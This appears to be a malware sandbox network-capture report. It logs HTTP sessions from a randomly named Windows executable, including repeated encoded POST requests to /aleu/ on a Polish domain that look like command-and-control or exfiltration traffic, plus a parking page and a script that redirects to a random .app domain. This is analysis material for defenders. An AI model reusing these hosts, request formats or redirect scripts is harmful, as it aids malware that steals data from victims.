20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 3c 21 2d 2d
                                                                                                                                      Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
                                                                                                                                      Apr 17, 2024 08:40:11.477212906 CEST1289INData Raw: 54 45 52 4d 49 4e 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41
                                                                                                                                      Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
                                                                                                                                      Apr 17, 2024 08:40:11.477241993 CEST1289INData Raw: 20 70 72 6f 66 65 73 69 6f 6e 61 6c 3c 2f 61 3e 20 63 6f 6e 20 74 75 20 6e 6f 6d 62 72 65 20 64 65 20 64 6f 6d 69 6e 69 6f 20 64 65 73 64 65 20 63 75 61 6c 71 75 69 65 72 20 64 69 73 70 6f 73 69 74 69 76 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
                                                                                                                                      Apr 17, 2024 08:40:11.477261066 CEST1289INData Raw: 20 4f 6e 6c 69 6e 65 22 3e 54 69 65 6e 64 61 20 4f 6e 6c 69 6e 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                                                                                                                                      Apr 17, 2024 08:40:11.477277994 CEST1289INData Raw: 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 76 70 73 22 20 74 69 74 6c 65 3d 22 53 65 72 76 69 64 6f 72 20 56 50 53 22 3e 73 65 72 76 69 64 6f 72 20 56 50 53 3c 2f 61 3e 3a 20 70 6f 74 65 6e 63 69 61 20 79 20 72 65 6e 64 69 6d 69 65 6e 74 6f 20 63 6f 6e
                                                                                                                                      Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
                                                                                                                                      Apr 17, 2024 08:40:11.477296114 CEST1289INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6f 6c 75 63 69 6f 6e 65 73 20 61 20 4d 65 64 69 64 61 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 65 6e 73 61 6e 64 6f 20 65 6e 20 63 61 64 61 20 63 6c 69 65 6e
                                                                                                                                      Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
                                                                                                                                      Apr 17, 2024 08:40:11.477313042 CEST360INData Raw: 63 74 6f 72 28 27 6c 61 62 65 6c 5b 66 6f 72 3d 64 6f 6d 5d 27 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 2b 20 64 6f 6d 61 69 6e 53 65 61 72 63 68 54 65 78 74 5b 64 6f 6d 61 69 6e 53 65 61 72 63 68 43 68 61 72 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
                                                                                                                                      Apr 17, 2024 08:40:11.477329969 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.44975252.175.38.24802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:17.624380112 CEST16INHTTP/1.1 200 OK
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:
                                                                                                                                      Apr 17, 2024 08:40:17.624408007 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.44975352.175.38.24802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:20.458161116 CEST16INHTTP/1.1 200 OK
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:
                                                                                                                                      Apr 17, 2024 08:40:20.458194971 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.44975452.175.38.24802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:23.285502911 CEST16INHTTP/1.1 200 OK
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:
                                                                                                                                      Apr 17, 2024 08:40:23.285527945 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.44975552.175.38.24802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:26.116575003 CEST16INHTTP/1.1 200 OK
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:
                                                                                                                                      Apr 17, 2024 08:40:26.116653919 CEST323INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(
                                                                                                                                      Apr 17, 2024 08:40:33.141088009 CEST6OUTData Raw: 47
                                                                                                                                      Data Ascii: G


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.449756178.211.137.59802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:31.789032936 CEST754OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 49 66 6f 62 61 79 72 79 62 49 2f 65 6d 76 70 70 4f 30 78 31 78 64 39 38 32 56 6e 73 59 4c 2b 78 33 57 61 73 41 75 71 54 6f 4b 6a 37 6e 41 36 36 57 4d 4c 4a 61 6d 32 46 79 71 7a 73 4a 4a 78 76 64 77 75 7a 30 69 59 69 56 39 47 77 65 76 63 44 4d 34 58 65 63 49 41 67 4b 44 48 78 47 52 42 6e 6e 2b 36 4c 6a 32 56 54 50 39 35 38 4f 78 67 71 62 32 54 69 6a 75 62 36 4d 39 57 42 6c 72 4e 30 51 52 6c 39 65 61 44 4a 4c 51 49 68 4d 65 4e 66 41 43 2f 68 63 6b 2b 5a 59 58 48 5a 52 36 35 49 6c 6f 4c 77 32 68 7a 6d 2f 59 56 6c 69 5a 4a 39 61 67 79 50 65 51 3d 3d
                                                                                                                                      Data Ascii: QbZ=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hck+ZYXHZR65IloLw2hzm/YVliZJ9agyPeQ==
                                                                                                                                      Apr 17, 2024 08:40:32.019088030 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:31 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.449757178.211.137.59802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:34.545046091 CEST774OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 75 78 33 33 71 73 53 73 43 54 76 4b 6a 37 67 77 36 37 53 4d 4c 30 61 6d 71 72 79 72 66 73 4a 4e 5a 76 64 78 2b 7a 30 31 45 6a 56 74 47 32 57 50 63 37 42 59 58 65 63 49 41 67 4b 44 43 6d 47 52 35 6e 6d 4e 53 4c 69 54 70 51 52 4e 35 39 50 78 67 71 52 57 54 6d 6a 75 62 49 4d 2f 6a 55 6c 70 46 30 51 54 39 39 65 4c 44 47 42 51 49 6e 49 65 4d 54 47 53 58 78 5a 56 4c 75 61 48 6e 6d 53 4f 74 58 6b 75 61 71 6e 51 53 78 74 59 78 57 2f 65 41 4a 58 6a 50 47 46 55 74 53 57 41 2f 50 78 4e 53 68 38 63 49 4a 6d 71 34 66 41 51 73 3d
                                                                                                                                      Data Ascii: QbZ=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtYxW/eAJXjPGFUtSWA/PxNSh8cIJmq4fAQs=
                                                                                                                                      Apr 17, 2024 08:40:34.767100096 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:34 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.449758178.211.137.59802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:37.377230883 CEST10856OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 6d 78 33 46 79 73 41 4e 43 54 75 4b 6a 37 76 67 36 41 53 4d 4c 54 61 6d 79 76 79 71 6a 38 4a 50 68 76 53 7a 6d 7a 67 51 77 6a 4d 64 47 32 55 50 63 41 4d 34 57 63 63 49 77 6b 4b 44 79 6d 47 52 35 6e 6d 4c 75 4c 30 32 56 51 54 4e 35 38 4f 78 67 6d 62 32 54 4b 6a 75 43 39 4d 2f 6d 76 6c 5a 6c 30 54 7a 74 39 53 5a 72 47 62 51 49 6c 50 65 4e 4f 47 53 4b 32 5a 56 58 59 61 48 54 4d 53 4a 46 58 6b 71 72 73 6a 51 43 68 70 59 64 30 37 4d 56 69 62 43 2f 58 43 6d 56 73 58 79 6e 45 73 76 61 71 37 4c 70 62 35 62 34 33 66 56 62 71 53 62 70 50 78 55 6b 68 55 4d 49 38 63 67 4a 62 57 36 32 57 53 4b 42 79 51 62 41 4a 33 69 74 6f 30 72 71 64 33 6b 68 78 38 54 58 79 45 44 6f 33 37 69 68 4d 35 76 43 65 74 53 77 79 57 61 58 6c 45 4c 45 76 51 7a 7a 50 52 65 53 32 36 67 68 75 4b 5a 47 55 6e 55 39 35 5a 48 35 39 56 47 62 47 41 57 73 75 4f 65 2b 58 4b 44 6a 6e 57 6d 6e 58 64 46 46 30 61 38 42 64 57 63 66 66 72 66 59 65 79 55 77 4b 43 4a 79 7a 6e 46 39 34 68 46 36 7a 65 61 59 7a 42 49 43 66 79 38 55 54 52 6e 78 4d 51 49 49 76 42 46 62 4c 53 66 30 71 31 6e 52 54 34 53 49 42 4f 69 4a 49 77 50 4c 45 64 45 6a 50 78 6c 59 63 78 72 35 74 34 67 6a 53 74 41 45 33 57 58 38 59 74 2b 4e 41 36 4f 46 6c 48 4a 44 49 55 33 41 6f 4d 57 50 52 49 6a 6c 77 58 37 62 67 4e 30 4c 76 66 79 70 52 4e 43 61 46 52 6f 67 73 75 34 39 43 4f 2f 31 58 62 48 69 48 4e 59 74 59 36 39 46 56 6a 59 46 5a 45 37 6d 68 32 6b 55 6b 41 4d 31 74 4e 37 31 31 6c 64 48 54 38 44 41 4a 4c 7a 56 42 48 41 55 6f 51 42 6d 31 34 43 70 7a 2f 36 75 55 37 2b 33 43 6d 62 65 45 44 6e 73 6d 2b 42 68 37 31 6f 57 74 41 67 75 48 67 78 33 6c 4c 51 72 74 6e 71 2b 54 4d 52 35 5a 38 5a 72 61 78 61 53 6e 78 36 4d 46 58 51 73 38 7a 31 7a 6a 67 48 76 4e 42 69 57 38 4d 56 6b 39 59 67 6c 36 75 61 68 4e 66 30 7a 6c 42 68 71 72 6d 37 6b 5a 36 4f 66 51 4e 68 33 52 37 59 35 52 52 78 65 66 56 42 6f 71 5a 4b 6a 4d 52 51 49 6e 30 39 50 75 77 39 52 4c 32 67 6b 64 66 45 35 50 4f 71 36 4c 4e 33 50 49 77 65 47 79 54 46 31 38 77 34 36 77 4a 6a 46 56 35 61 4c 63 78 42 75 42 46 4f 41 69 4e 71 41 54 6c 54 33 63 54 38 6d 6b 7a 4c 59 61 44 4a 73 6e 5a 6a 56 76 43 43 33 63 37 55 63 4c 6e 4f 45 35 74 37 30 50 36 4e 6d 7a 43 74 43 4d 6d 34 34 47 49 34 59 46 46 46 39 48 62 33 30 31 56 6b 64 36 63 4c 67 6e 61 76 71 46 78 48 48 79 58 68 32 79 4b 76 54 52 46 6d 61 46 63 38 4e 49 53 46 55 57 39 79 32 44 33 4b 71 74 2b 6d 44 33 41 48 78 76 53 4f 79 47 4d 65 61 6f 72 31 70 32 55 52 48 61 62 69 52 6b 4e 64 39 35 59 6d 4e 6c 37 36 70 6c 70 72 31 30 56 44 47 63 6c 6a 56 66 6e 63 76 6f 68 59 51 6d 58 67 45 65 41 34 76 63 44 31 4a 78 4f 4a 77 78 45 39 45 72 41 4a 63 45 33 36 76 67 43 41 62 6e 4d 63 79 49 67 54 7a 34 48 5a 69 6f 2b 6d 4d 5a 63 55 36 4c 49 33 2f 35 64 78 35 2f 34 5a 6d 70 4b 4b 64 5a 51 75 49 4b 2f 4e 6e 32 6d 57 58 79 36 79 6f 51 42 78 58 32 75 56 37 66 75 41 49 50 73 6d 66 2f 64 54 48 36 5a 5a 4f 4c 43 43 59 68 64 4f 75 56 49 69 59 32 79 33 4a 49 72 55 53 6e 35 55 44 4e 56 67 46 78 6e 65 50 33 48 4c 6a 56 30 41 44 48 72 73 58 59 57 49 57 71 49 64 62 38 65 79 50 71 6d 4e 34 31 53 33 6b 65 4a 54 36 41 63 31 39 48 2b 34 41 41 44 36 71 43 47 51 63 58 55 54 64 34 6b 74 65 6d 50 74 73 38 32 2f 59 55 34 6a 62 75 58 77 45 79 59 32 72 36 33 4f 6c 30 6a 61 6f 6a 6f 66 6a 75 37 4a 58 58 50 2f 67 6a 61 4d 56 56 58 2b 57 38 32 49 73 7a 34 36 68 46 6b 74 4e 55 49 46 64 61 47 55 38 54 34 35 55 4b 4f 50 2f 4a 61 51 57 43 59 67 52 32 38 59 6a 65 69 4b 4d 2b 4f 37 68 6b 33 42 4c 65 41 6c 78 4b 31 6f 50 49 47 51 53 66 6f 6d 34 43 47 30 4b 31 36 47 44 4e 4b 43 4b 30 7a 57 4a 72 6a 34 57 38 34 62 6d 35 5a 4c 55 4f 6a 63 71 70 31 61 44 6c 56 58 66 72 7a 72 74 72 74 37 6c 79 4d 6d 31 65 48 6f 6e 33 77 7a 6a 51 6b 65 74 6e 7a 50 53 2b 5a 43 30 45 73 78 61 56 4f 35 2b 53 45 62 77 7a 77 55 73 51 41 63 6b 6f 62 32 73 33 63 6c 72 6e 6c 69 39 48 48 6d 38 35 63 52 4d 57 4c 38 36 69 42 70 4e 74 38 62 75 50 4c 52 79 45 46 75 6c 63 65 41 41 73 68 38 42 54 53 38 2b 62 7a 49 48 6f 71 35 45 45 55 6e 5a 65 35 4b 37 36 32 4d 62
